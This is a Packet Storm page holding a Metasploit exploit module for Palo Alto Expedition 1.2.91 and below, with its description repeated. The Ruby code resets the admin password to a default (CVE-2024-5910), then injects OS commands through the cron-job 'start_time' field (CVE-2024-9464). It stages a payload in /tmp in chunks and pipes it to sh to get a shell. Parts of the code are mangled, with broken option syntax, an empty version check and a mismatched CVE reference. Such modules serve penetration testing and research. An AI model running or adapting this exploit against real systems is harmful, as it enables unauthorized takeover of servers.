

Palo Alto Expedition 1.2.91 Remote Code Execution

This Metasploit module lets you obtain remote code execution in Palo Alto Expedition versions 1.2.91 and below. The first vulnerability, CVE-2024-5910, allows to reset the password of the admin user, and the second vulnerability, CVE-2024-9464, is an authenticated OS command injection. In a default installation, commands will get executed in the context of www-data. When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will first try to reset the admin password and then perform the OS command injection.

Packet Storm
class MetasploitModule < Msf::Exploit::Remote  class XsrfExceptionError < StandardError; end  class XsrfExceptionUnreachableError < XsrfExceptionError; end  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464)',        'Description' => %q{          Obtain remote code execution in Palo Alto Expedition version 1.2.91 and below.          The first vulnerability, CVE-2024-5910, allows to reset the password of the admin user, and the second vulnerability, CVE-2024-9464, is an authenticated OS command injection. In a default installation, commands will get executed in the context of www-data.          When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will first try to reset the admin password and then perform the OS command injection.        },        'License' => MSF_LICENSE,        'Author' => [          'Michael Heinzl', # MSF Module          'Zach Hanley', # Discovery CVE-2024-9464 and PoC          'Enrique Castillo', # Discovery CVE-2024-9464          'Brian Hysell' # Discovery CVE-2024-5910        ],        'References' => [          [ 'URL', ''],          [ 'URL', ''],          [ 'URL', ''],          ['URL', ''],          ['URL', ''],          [ 'CVE', '2024-5910'],          [ 'CVE', '2024-24809']        ],        'DisclosureDate' => '2024-10-09',        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => 'True',          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),          'FETCH_WRITABLE_DIR' => '/tmp'        },        'Payload' => {          # the vulnerability allows the characters " and \          # but the stager in this module does not          'BadChars' => "\x22\x3a\x3b\x5c" # ":;\        },        'Platform' => %w[unix linux],        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Linux Command',            {              'Arch' => [ ARCH_CMD ],              'Platform' => %w[unix linux]              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, ACCOUNT_LOCKOUTS]        }      )    )    register_options(      ['USERNAME', [false, 'Username for authentication, if available', 'admin']),'PASSWORD', [false, 'Password for the specified user', 'paloalto']),'TARGETURI', [ true, 'The URI for the Expedition web interface', '/']),'RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false]),'WRITABLE_DIR', [ false, 'A writable directory to stage the command', '/tmp/' ]),      ]    )  end  def xsrf_token_value    user = @username || datastore['USERNAME']    password = @password || datastore['PASSWORD']    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'bin/Auth.php'),      'keep_cookies' => true,      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'get',        'type' => 'login_users',        'user' => user,        'password' => password      }    )    raise XsrfExceptionUnreachableError, 'Failed to receive a reply from the server.' unless res    data = res.get_json_document    raise XsrfExceptionUnreachableError, "Unexpected reply from the server: #{data}" unless data['csrfToken']    print_good('Successfully authenticated')    csrftoken = data['csrfToken']    raise XsrfExceptionUnreachableError, 'csrftoken not found.' unless csrftoken    vprint_status("Got csrftoken: #{csrftoken}")    csrftoken  end  def check    unless datastore['USERNAME'] && datastore['PASSWORD']      unless datastore['RESET_ADMIN_PASSWD']        print_bad('No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.')        return CheckCode::Unknown      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')      )      return CheckCode::Unknown('Failed to receive a reply from the server.') unless res      if res.code == 403        return CheckCode::Safe      end      return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓  Admin password restored to:    'paloalto'      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")      @password = respass      @username = 'admin'      @reset = true    end    begin      @xsrf_token_value = xsrf_token_value    rescue XsrfException::Error      return CheckCode::Safe    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'bin/MTSettings/settings.php?param=versions'),      'keep_cookies' => true,      'headers' => {        'Csrftoken' => @xsrf_token_value      }    )    data = res.get_json_document    version = data.dig('msg', 'Expedition')    if version.nil?      return CheckCode::Unknown    end    print_status('Version retrieved: ' + version)    if >'1.2.91')      return CheckCode::Safe    end    return CheckCode::Appears  end  def execute_command(cmd, check_res)    name = Rex::Text.rand_text_alpha(4..8)    vprint_status("Running command: #{cmd}")    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),      'keep_cookies' => true,      'headers' => {        'Csrftoken' => @xsrf_token_value      },      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'set',        'type' => 'cron_jobs',        'project' => 'pandb',        'name' => name,        'cron_id' => 1,        'recurrence' => 'Daily',        'start_time' => "\";#{cmd} #"      }    )    if check_res && !res.nil? && res.code != 200 # final execute command does not background for some reason?      fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}")    end  end  def exploit    cmd = payload.encoded    chunk_size = rand(25..35)    vprint_status("Command chunk size = #{chunk_size}")    cmd_chunks = cmd.chars.each_slice(chunk_size).map(&:join)    staging_file = (datastore['WRITABLE_DIR'] + '/' + Rex::Text.rand_text_alpha(3..5)).gsub('//', '/')    if !@reset && !(datastore['USERNAME'] && datastore['PASSWORD'])      unless datastore['RESET_ADMIN_PASSWD']        fail_with(Failure::BadConfig, 'No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again..')      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')      )      fail_with(Failure::Unreachable, 'Failed to receive a reply.') unless res      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓  Admin password restored to:    'paloalto'      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")      @password = respass      @username = 'admin'    end    begin      @xsrf_token_value = xsrf_token_value    rescue XsrfException::Error      return fail_with(Failure::Unreachable, 'Failed to receive XSRF token.')    end    print_status('Adding a new cronjob...')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),      'keep_cookies' => true,      'headers' => {        'Csrftoken' => @xsrf_token_value      },      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'add',        'type' => 'new_cronjob',        'project' => 'pandb'      }    )    unless res      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')    end    data = res.get_json_document    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true    # Stage the command to a file    redirector = '>'    chunk_counter = 0    cmd_chunks.each do |chunk|      chunk_counter += 1      vprint_status("Staging chunk #{chunk_counter} of #{cmd_chunks.count}")      write_chunk = "echo -n \"#{chunk}\" #{redirector} #{staging_file}"      execute_command(write_chunk, true)      redirector = '>>'      sleep 1    end    # Once we launch the payload, we don't seem to be able to execute another command,    # even if we try to background the command, so we need to execute and delete in    # the same command.    print_good('Command staged; command execution requires a timeout and will take a few seconds.')    execute_command("cat #{staging_file} | sh && rm #{staging_file}", false)    sleep 3    print_status('Check thy shell.')  endend

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Palo Alto Expedition 1.2.91 Remote Code Execution

This Metasploit module lets you obtain remote code execution in Palo Alto Expedition versions 1.2.91 and below. The first vulnerability, CVE-2024-5910, allows to reset the password of the admin user, and the second vulnerability, CVE-2024-9464, is an authenticated OS command injection. In a default installation, commands will get executed in the context of www-data. When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will first try to reset the admin password and then perform the OS command injection.

Palo Alto Expedition 1.2.91 Remote Code Execution

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